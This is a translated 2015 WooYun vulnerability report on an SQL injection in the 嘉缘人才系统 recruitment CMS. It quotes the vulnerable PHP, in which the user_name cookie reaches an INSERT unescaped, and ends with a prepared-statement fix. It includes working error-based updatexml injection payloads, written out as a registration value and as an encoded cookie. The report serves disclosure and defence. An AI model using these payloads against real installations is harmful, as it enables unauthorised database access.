
Vulnerability summary

Defect ID: wooyun-2015-098098

Title: SQL injection in 嘉缘人才系统 (Jiayuan recruitment system)

Related vendor: finereason.com

Author: 牛肉包子

Submitted: 2015-03-02 11:34

Fixed: 2015-06-05 11:37

Published: 2015-06-05 11:37

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-02: Details sent to the vendor, awaiting the vendor's handling
2015-03-07: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-05-01: Details opened to core white hats and experts in related fields
2015-05-11: Details opened to regular white hats
2015-05-21: Details opened to intern white hats
2015-06-05: Details opened to the public

Brief description:

As the title says.

Detailed description:

Look at frcms\inc\contacts.php:

// Excerpt from frcms\inc\contacts.php as quoted in the report; the outer
// if($companyid!=0) block continues beyond what is shown here.
if($companyid!=0){
    if($hireid!=0){
        $db->query("update {$cfg['tb_pre']}hire set h_visitcount=h_visitcount+1 where h_id=$hireid and h_comid=$companyid");
        $goto=$cfg['path']."co/hire.php?id=$hireid";
        $rs = $db->get_one("select h_place,h_address,h_post,h_contact,h_telshowflag,h_tel,h_fax,h_emailshowflag,h_email,h_member,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}hire INNER JOIN {$cfg['tb_pre']}member on h_comid=m_id where h_id=$hireid and h_comid=$companyid");
        if($rs){
            $Complace=$rs['h_place'];$Comaddress=$rs['h_address'];$Compost=$rs['h_post'];$Comcontact=$rs['h_contact'];
            $Comtelshowflag=$rs['h_telshowflag'];$Comtel=$rs['h_tel'];$Comfax=$rs['h_fax'];
            $Comemailshowflag=$rs['h_emailshowflag'];$Comemail=$rs['h_email'];$ComMemberlogin=$rs['h_member'];
            $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat'];
        }else{
            echo "联系方式读取出错!";exit;
        }
    }else{
        $db->query("update {$cfg['tb_pre']}member set m_hits=m_hits+1 where m_id=$companyid");
        $goto=$cfg['path']."co/company.php?id=$companyid";
        $rs = $db->get_one("select m_address,m_post,m_contact,m_telshowflag,m_tel,m_fax,m_emailshowflag,m_email,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}member where m_id=$companyid");
        if($rs){
            $Comaddress=$rs['m_address'];$Compost=$rs['m_post'];$Comcontact=$rs['m_contact'];
            $Comtelshowflag=$rs['m_telshowflag'];$Comtel=$rs['m_tel'];$Comfax=$rs['m_fax'];
            $Comemailshowflag=$rs['m_emailshowflag'];$Comemail=$rs['m_email'];$ComMemberlogin=$rs['m_login'];
            $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat'];
        }else{
            echo "联系方式读取出错!";exit;
        }
    }
    // $member_name is read straight from the user_name cookie (see _getcookie below)
    $member_name=_getcookie("user_name");$Show=0;$bid=$hireid!=0?$hireid:$companyid;$type=$hireid!=0?3:2;
    if($username==''){$member_login="访客";$member_name="访客";}else{$member_login=$username;}
    // the cookie value is concatenated unescaped into the INSERT: this is the injection point
    $db->query("Insert into {$cfg['tb_pre']}rbrower(r_bid,r_bmember,r_member,r_adddate,r_name,r_type) values('$bid','$ComMemberlogin','$member_login',NOW(),'$member_name',$type)");


Here $member_name is obtained from _getcookie("user_name") and then goes straight into the SQL statement.
Look at the _getcookie function:

function _getcookie($var) {
    global $cfg;
    $var = $cfg['cookie_pre'].$var;
    return isset($_COOKIE[$var]) ? $_COOKIE[$var] : '';
}


Checking the global include file, there is no filtering of cookies either.
Next, register a user whose real name is

=1' updatexml(1,concat(0x7e,(user())),0) or'','1','1','1')#

(the value is used as-is).

[screenshot 6.jpg]


Once stored in the database, the escape characters are stripped, so the value sits in the table unescaped.

[screenshot 8.png]


Then visit

http://127.0.0.1/frcms/inc/contacts.php?resumeid=1


[screenshot 7.jpg]


You can see that MySQL has already thrown an error. The cookie sent was:

fr_user_name==%3D1%27+or+char%28%40%60%27%60%29+or+updatexml%281%2Cconcat%280x7e%2C%28user%28%29%29%29%2C0%29+or%27%27%2C%271%27%2C%271%27%2C%271%27%29%23


Looking at the MySQL query log at this point shows

[screenshot 9.jpg]

that the statement executed successfully.
From my previous report,
WooYun: 嘉缘人才系统最新版注入(无视防御) (injection in the latest version of the Jiayuan recruitment system, bypassing its defences),
it is already known that this CMS stores MySQL errors in a file, and how to locate that file.

[screenshot 8.jpg]

Proof of vulnerability:

[screenshot 9.jpg]

[screenshot 8.jpg]

Fix:

Escape the cookie value before it reaches the SQL statement.
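As an added example (not frcms code), the rbrower INSERT from contacts.php rewritten with PDO prepared statements, which removes the cookie value from the SQL text entirely instead of relying on escaping. The DSN, credentials and the 'fr_' table prefix are assumptions; the 'fr_' cookie prefix matches the fr_user_name cookie shown above.

```php
<?php
// Added example, not frcms code: the rbrower INSERT from contacts.php with PDO
// prepared statements. DSN, credentials and the table prefix are assumptions.
declare(strict_types=1);

// Same lookup as frcms's _getcookie(); the value is returned untouched and treated
// as opaque data. Safety comes from how it is used below, not from filtering here.
function getCookieValue(array $cfg, string $var): string
{
    $key = $cfg['cookie_pre'] . $var;
    return isset($_COOKIE[$key]) ? (string) $_COOKIE[$key] : '';
}

function recordBrowse(PDO $db, string $tbPre, int $bid, string $comMemberLogin,
                      string $memberLogin, string $memberName, int $type): bool
{
    // The prefix is configuration, not request data, but it is still spliced into
    // SQL text, so restrict it to a plain identifier fragment.
    if (!preg_match('/^[A-Za-z0-9_]{0,16}$/', $tbPre)) {
        throw new InvalidArgumentException('unsafe table prefix');
    }
    // Every value is bound as a parameter. A quote in $memberName (the user_name
    // cookie) or in $comMemberLogin (a login read back from the database) stays
    // literal data, which closes both the direct and the stored injection path.
    $sql = "INSERT INTO {$tbPre}rbrower (r_bid, r_bmember, r_member, r_adddate, r_name, r_type)"
         . " VALUES (:bid, :bmember, :member, NOW(), :name, :type)";
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':bid', $bid, PDO::PARAM_INT);
    $stmt->bindValue(':bmember', $comMemberLogin, PDO::PARAM_STR);
    $stmt->bindValue(':member', $memberLogin, PDO::PARAM_STR);
    $stmt->bindValue(':name', $memberName, PDO::PARAM_STR);
    $stmt->bindValue(':type', $type, PDO::PARAM_INT);
    return $stmt->execute();
}

// Usage with assumed connection details.
$cfg = ['cookie_pre' => 'fr_', 'tb_pre' => 'fr_'];
$db = new PDO('mysql:host=127.0.0.1;dbname=frcms;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // raise, never echo SQL errors
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares: values never enter SQL text
]);
$bid         = 1;      // hire id or company id being viewed
$type        = 3;      // 3 = hire record, 2 = company record, as in contacts.php
$memberLogin = '访客';  // frcms's "guest" marker when nobody is logged in
recordBrowse($db, $cfg['tb_pre'], $bid, 'company_login', $memberLogin,
             getCookieValue($cfg, 'user_name'), $type);
```

With ERRMODE_EXCEPTION the application decides how to report failures, so MySQL error text no longer ends up in a page or a world-readable log file as the report describes.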

Copyright notice: when reposting, please credit the source 牛肉包子@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2015-06-05 11:37

Vendor reply:

Latest status:

None yet